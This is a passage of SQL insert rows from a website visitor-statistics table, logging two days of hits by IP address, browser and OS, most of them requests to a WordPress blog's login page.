(15713,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.241.202','000',0,1,0),
(15714,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.94.151','000',0,1,0),
(15715,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.84.227','000',0,1,0),
(15716,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.50.240','000',0,1,0),
(15717,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.124.12','000',0,1,0),
(15718,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.68.67','000',0,1,0),
(15719,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.65.235','000',0,1,0),
(15720,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.175.151','000',0,1,0),
(15721,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.82.9','000',0,1,0),
(15722,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.155.46','000',0,1,0),
(15723,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.192.198','000',0,1,0),
(15724,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.196.80','000',0,1,0),
(15725,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.144.95','000',0,1,0),
(15726,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.225.32.227','000',0,2,0),
(15727,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.177.57','000',0,1,0),
(15728,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.129.171','000',0,1,0),
(15729,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.181.163','000',0,1,0),
(15730,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.154.185','000',0,1,0),
(15731,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.201.33','000',0,1,0),
(15732,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.145.238','000',0,1,0),
(15733,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.167.4','000',0,1,0),
(15734,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.187.232','000',0,1,0),
(15735,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.72.178','000',0,1,0),
(15736,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.97.55','000',0,1,0),
(15737,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.146.213','000',0,1,0),
(15738,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.161.240','000',0,1,0),
(15739,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.87.168','000',0,1,0),
(15740,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.133.180','000',0,1,0),
(15741,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.18.213.104','000',0,1,0),
(15742,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.101.54.49','000',0,1,0),
(15743,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.108.217','000',0,2,0),
(15744,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.208.114','000',0,1,0),
(15745,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.62.82','000',0,1,0),
(15746,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.55.137','000',0,1,0),
(15747,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.93.66','000',0,1,0),
(15748,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.178.61','000',0,1,0),
(15749,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.12.189','000',0,1,0),
(15750,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.107.129','000',0,1,0),
(15751,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.218.203','000',0,1,0),
(15752,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.48.42','000',0,1,0),
(15753,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.91.10','000',0,1,0),
(15754,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.160.27','000',0,1,0),
(15755,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.196.245','000',0,1,0),
(15756,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.130.32','000',0,1,0),
(15757,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.138.3','000',0,1,0),
(15758,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.4.84','000',0,1,0),
(15759,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.15.169','000',0,1,0),
(15760,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.18.113.56','000',0,1,0),
(15761,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.172.39','000',0,1,0),
(15762,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.168.248','000',0,1,0),
(15763,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.99.78','000',0,1,0),
(15764,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.250.192','000',0,1,0),
(15765,'2021-11-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(15766,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.181.44','000',0,1,0),
(15767,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.144.26','000',0,1,0),
(15768,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.113.227','000',0,1,0),
(15769,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.144.130','000',0,1,0),
(15770,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.215.240.144','000',0,1,0),
(15771,'2021-11-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','198.204.238.212','000',0,2,0),
(15772,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.68.96','000',0,2,0),
(15773,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.19.145','000',0,1,0),
(15774,'2021-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(15775,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.176.49.164','000',0,1,0),
(15776,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.196.56','000',0,1,0),
(15777,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.174.3','000',0,1,0),
(15778,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.143.138','000',0,1,0),
(15779,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.146.228','000',0,1,0),
(15780,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.45.189','000',0,1,0),
(15781,'2021-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.100.138','000',0,2,0),
(15782,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.158.30','000',0,1,0),
(15783,'2021-11-24','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','1.1.178.75','000',0,1,0),
(15784,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.52.186.215','000',0,1,0),
(15785,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.116.0','000',0,1,0),
(15786,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.225.8.222','000',0,1,0),
(15787,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.14.72','000',0,1,0),
(15788,'2021-11-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.180.231.247','000',0,2,0),
(15789,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.90.14','000',0,1,0),
(15790,'2021-11-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(15791,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.240.194','000',0,1,0),
(15792,'2021-11-24','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.213.150.194','000',0,1,0),
(15793,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.125.52','000',0,1,0),
(15794,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.36.32','000',0,1,0),
(15795,'2021-11-24','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,4,0),
(15796,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.132.146','000',0,1,0),
(15797,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.101.105','000',0,1,0),
(15798,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.162.170','000',0,1,0),
(15799,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.87.28','000',0,1,0),
(15800,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.187.124','000',0,1,0),
(15801,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.182.155','000',0,1,0),
(15802,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.163.111','000',0,1,0),
(15803,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.216.19','000',0,1,0),
(15804,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.243.17','000',0,1,0),
(15805,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.85.167','000',0,1,0),
(15806,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.133.49','000',0,1,0),
(15807,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.95.187','000',0,1,0),
(15808,'2021-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.75.156','000',0,1,0),
(15809,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.72.146','000',0,1,0),
(15810,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.115.191','000',0,1,0),
(15811,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.219.102','000',0,1,0),
(15812,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.249.105','000',0,1,0),
(15813,'2021-11-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.253.237','000',0,1,0),
(15814,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.4.100','000',0,1,0),
(15815,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.205.166','000',0,2,0),
(15816,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.222.253','000',0,1,0),
(15817,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.29.28','000',0,1,0),
(15818,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.117.62','000',0,1,0),
(15819,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.209.168','000',0,1,0),
(15820,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.12.238','000',0,1,0),
(15821,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.209.180','000',0,1,0),
(15822,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.163.148','000',0,1,0),
(15823,'2021-11-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,2,0),
(15824,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.102.53','000',0,1,0),
(15825,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.145.244','000',0,1,0),
(15826,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.88.41','000',0,1,0),
(15827,'2021-11-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(15828,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.70.168','000',0,1,0),
(15829,'2021-11-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(15830,'2021-11-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.49','000',0,1,0),
(15831,'2021-11-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(15832,'2021-11-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(15833,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.14.76','000',0,1,0),
(15834,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.160.24','000',0,1,0),
(15835,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.61.100','000',0,1,0),
(15836,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.87.86','000',0,1,0),
(15837,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.46.66','000',0,1,0),
(15838,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.2.207','000',0,1,0),
(15839,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.199.113','000',0,1,0),
(15840,'2021-11-24','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','49.12.13.98','000',0,1,0),
(15841,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.13.23','000',0,1,0),
(15842,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.248.167','000',0,2,0),
(15843,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.189.31','000',0,1,0),
(15844,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.165.238','000',0,1,0),
(15845,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.103.140','000',0,1,0),
(15846,'2021-11-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.113.95.210','000',0,2,0),
(15847,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.17.250','000',0,1,0),
(15848,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.2.180','000',0,1,0),
(15849,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.234.147','000',0,1,0),
(15850,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.141.107','000',0,1,0),
(15851,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.243.144','000',0,1,0),
(15852,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.101.235','000',0,1,0),
(15853,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.189.228','000',0,1,0),
(15854,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.138.46','000',0,1,0),
(15855,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.21.211','000',0,1,0),
(15856,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.32.127','000',0,1,0),
(15857,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.140.139','000',0,1,0),
(15858,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.205.226','000',0,1,0),
(15859,'2021-11-24','https://www.google.com/','Firefox','OS X','10.15',NULL,NULL,'','47.181.37.190','000',0,2,0),
(15860,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.144.127','000',0,1,0),
(15861,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.46.140','000',0,1,0),
(15862,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.12.198.236','000',0,1,0),
(15863,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.25.164','000',0,1,0),
(15864,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.51.63','000',0,1,0),
(15865,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.190.18','000',0,1,0),
(15866,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.200.179','000',0,1,0),
(15867,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.201.135','000',0,1,0),
(15868,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.111.91','000',0,1,0),
(15869,'2021-11-25','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','27.115.124.75','000',0,2,0),
(15870,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.16.207','000',0,1,0),
(15871,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.16.109','000',0,1,0),
(15872,'2021-11-25','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.43','000',0,1,0),
(15873,'2021-11-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(15874,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.112.135','000',0,1,0),
(15875,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.251.244','000',0,1,0),
(15876,'2021-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.44','000',0,2,0),
(15877,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.146.189','000',0,1,0),
(15878,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.147.197','000',0,1,0),
(15879,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.162.137','000',0,1,0),
(15880,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.136.137','000',0,1,0),
(15881,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.239.38','000',0,1,0),
(15882,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.202.119','000',0,1,0),
(15883,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.136.84.161','000',0,1,0),
(15884,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.96.113','000',0,1,0),
(15885,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.234.111','000',0,1,0),
(15886,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.99.138','000',0,1,0),
(15887,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.151.22','000',0,1,0),
(15888,'2021-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.160.34.97','000',0,2,0),
(15889,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.107.21','000',0,1,0),
(15890,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.28.130','000',0,1,0),
(15891,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.25.207','000',0,1,0),
(15892,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.29.28','000',0,1,0),
(15893,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.48.42','000',0,1,0),
(15894,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.199.98','000',0,1,0),
(15895,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.7.226','000',0,1,0),
(15896,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.208.215','000',0,1,0),
(15897,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.164.138','000',0,1,0),
(15898,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.112.23','000',0,1,0),
(15899,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.37.98','000',0,1,0),
(15900,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.129.24','000',0,1,0),
(15901,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.158.165','000',0,1,0),
(15902,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.29.122','000',0,1,0),
(15903,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.213.140','000',0,1,0),
(15904,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.185.123','000',0,1,0),
(15905,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.42.191','000',0,1,0),
(15906,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.189.236','000',0,1,0),
(15907,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.190.155.182','000',0,1,0),
(15908,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.198.0','000',0,2,0),
(15909,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.153.124','000',0,1,0),
(15910,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.192.109','000',0,1,0),
(15911,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.129.85','000',0,1,0),
(15912,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.107.93','000',0,1,0),
(15913,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.240.38','000',0,1,0),
(15914,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.167.30','000',0,1,0),
(15915,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.210.48','000',0,1,0),
(15916,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.82.37','000',0,1,0),
(15917,'2021-11-25','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','185.120.233.47','000',0,1,0),
(15918,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.39.39','000',0,1,0),
(15919,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.59.20','000',0,1,0),
(15920,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.51.124','000',0,1,0),
(15921,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.6.170','000',0,1,0),
(15922,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.168.216','000',0,1,0),
